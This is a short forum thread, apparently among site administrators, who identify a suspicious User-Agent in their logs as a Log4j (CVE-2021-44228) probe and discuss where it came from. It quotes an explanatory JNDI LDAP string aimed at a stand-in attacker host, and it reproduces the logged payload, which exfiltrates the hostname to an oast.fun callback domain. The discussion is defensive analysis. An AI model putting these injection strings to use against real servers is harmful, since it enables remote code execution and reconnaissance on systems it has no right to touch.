I'm going to throw this out there, that this is the Apache Log4j Vulnerability (CVE-2021-44228).

--------------
Considering the log content is usually exposed to users and can be easily controlled by the attacker in many applications, once the attacker controls the string as shown in Figure 3 and sets a malicious Java class on an attacker-controlled LDAP server, the lookup method will be used to execute the malicious Java class on the remote LDAP server.

Example of a Malicious JNDI lookup string with LDAP, shown for the purpose of explaining CVE-2021-44228

jndi:ldap://www . attacker . com / malicious_java_class
-------------

The domain oast.fun actually resolves to 206.189.156.69 - that's a Digital Ocean IP.

What IP's were you getting this from?

UA: ${jndi:ldap://${:-935}${:-699}.${hostName}.useragent.d338jcn0129lesrb7s0grurjrymqwzg7d.oast.fun}

I haven't seen that specific format, but I do occasionally get UAs that clearly originated with a fill-in-the-blank template, and the inept botrunner neglected to fill in the blank. Closely analogous to saying out loud “I comma your name comma swear slash affirm” and so on.

Here is the best answer out there:

[security.stackexchange.com...]

Originated from 134.122.5.63.

ns1.oast.fun resolves to a page that refers you to a github project. (I'm guessing a snooper utility of some sort)

Thanks for the link Brett - tons of good stuff there

...and the inept botrunner neglected to fill in the blank.

Thank goodness there are more sloppy joes like that than the clever ones!